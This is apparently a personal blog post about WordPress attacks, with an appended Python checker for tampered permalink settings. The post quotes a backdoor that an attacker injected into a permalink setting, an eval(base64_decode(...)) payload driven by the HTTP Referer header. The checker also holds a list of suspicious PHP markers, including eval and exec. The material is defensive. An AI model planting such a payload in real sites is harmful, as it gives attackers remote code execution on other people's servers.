Ahh… the dreaded
…a very important update to apply to your sites as soon as possible because it fixes a core security bug in our HTML sanitation library, called KSES. I would rate this release as “critical.”
Yeah. What that says to me is, “A hacker has already looked at the vulnerabilities in 3.0.3 and written a script to exploit it and deployed it on the websites he/she has already hacked so that it can go out and get access to even more web servers by simply crawling the web looking for WordPress installations that haven’t been updated yet.”
UlricheDmond using the email address ulrichedmondsuses@gmail.com just created an account on this blog.
Since (as the domain name might suggest) this is my blog (Eric Shefferman), there’s no need for anyone else to have an account here.
I googled the name and so far found
http://savelblogs.com/?p=1566
which lists this name/email as someone who tried to hack their blog (along with a list of other hacker usernames).
They seem to be a busy person/hacker/software robot – they also signed up here on September 7, 2009
http://bbshowcase.org/forums/profile/ulrichedmond
and here on September 8, 2009:
http://www.nudjit.com/community/profile/ulrichedmond
And probably other places that just haven’t been indexed by google yet.
I deleted the user, but this is getting crazy. Static HTML websites are looking better and better.
- – -
Yup, an hour after I posted this, the same user/email registered on another blog of mine that is totally unrelated. This is pretty stupid since the only reason this is happening is as part of a WordPress security exploit. Someone thinks that by getting a user onto WordPress they can then elevate the user to admin level access and screw around. It’s not like I can stay up all night to try to delete these users as fast as some automated system can add them.
I still have no idea what this means.
I’m currently running WordPress 2.8.4 on this site.
One of my older sites was hacked as per
http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/
and the permalinks were changed to
/%year%/%monthnum%/%day%/%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
There was a hidden user named “WordPress” — javascript was being used to prevent the user from showing in the admin users section (and it didn’t show the user in the user count). My computer is running slow, so when looking at the user list this second user would appear and then disappear as the javascript executed. On a faster computer, it would have been impossible to see the hidden user. Dumbass javascript tricks.
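The injected permalink structure above is a useful indicator to check for. The following is an added example (not code from this blog or from WordPress) that scans a `permalink_structure` value for anything that is not a normal WordPress structure tag or path character, and flags the `eval`/`base64_decode`/`$_SERVER` markers seen in the attack. The set of allowed structure tags is my own assumption of the documented tags, and the sample rows are constructed to look like `option_name`/`option_value` pairs from the `wp_options` table.

```python
import re
from typing import Dict, List, Sequence, Tuple

# The exact injected permalink structure quoted in the post above.
INJECTED = ("/%year%/%monthnum%/%day%/%postname%/"
            "%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/")

# Structure tags WordPress documents for permalinks (assumed list; extend if needed).
ALLOWED_TAGS = {
    "%year%", "%monthnum%", "%day%", "%hour%", "%minute%", "%second%",
    "%post_id%", "%postname%", "%category%", "%author%",
}

# Substrings that have no business in a permalink structure. The first three
# are exactly what the injected value contained.
SUSPICIOUS_MARKERS = ("eval(", "base64_decode", "$_SERVER", "${", "<?",
                      "system(", "exec(", "passthru(")

TAG_RE = re.compile(r"%[a-z_]+%")
# Characters a clean structure may contain once the tags are stripped.
SAFE_CHARS_RE = re.compile(r"[A-Za-z0-9/_.\-]")


def find_permalink_problems(structure: str) -> List[str]:
    """Return a list of human-readable reasons the structure looks tampered with."""
    problems = []
    for marker in SUSPICIOUS_MARKERS:
        if marker in structure:
            problems.append(f"contains {marker!r}")
    for tag in TAG_RE.findall(structure):
        if tag not in ALLOWED_TAGS:
            problems.append(f"unknown structure tag {tag}")
    # Remove known tags, then anything left that is not a path character is suspect.
    residue = TAG_RE.sub("", structure)
    leftover = SAFE_CHARS_RE.sub("", residue)
    if leftover:
        problems.append(f"unexpected characters {leftover!r}")
    return problems


def is_suspicious_permalink(structure: str) -> bool:
    return bool(find_permalink_problems(structure))


def scan_options(rows: Sequence[Tuple[str, str]]) -> Dict[str, List[str]]:
    """Given (option_name, option_value) rows, return findings keyed by option name.

    Only the permalink_structure option is inspected here; other rows are ignored.
    """
    findings = {}
    for name, value in rows:
        if name == "permalink_structure":
            problems = find_permalink_problems(value)
            if problems:
                findings[name] = problems
    return findings


# Constructed sample rows: a clean site and the compromised one from the post.
CLEAN_ROWS = [("siteurl", "http://example.invalid"),
              ("permalink_structure", "/%year%/%monthnum%/%day%/%postname%/")]
HACKED_ROWS = [("siteurl", "http://example.invalid"),
               ("permalink_structure", INJECTED)]

if __name__ == "__main__":
    for label, rows in (("clean", CLEAN_ROWS), ("hacked", HACKED_ROWS)):
        print(label, scan_options(rows) or "no findings")
```

On a live site the same check can be run against the output of `SELECT option_value FROM wp_options WHERE option_name = 'permalink_structure'`, and it is worth keeping alongside a count of rows in `wp_users` compared with what the admin screen shows, since the hidden "WordPress" user described above was concealed only in the browser, not in the database.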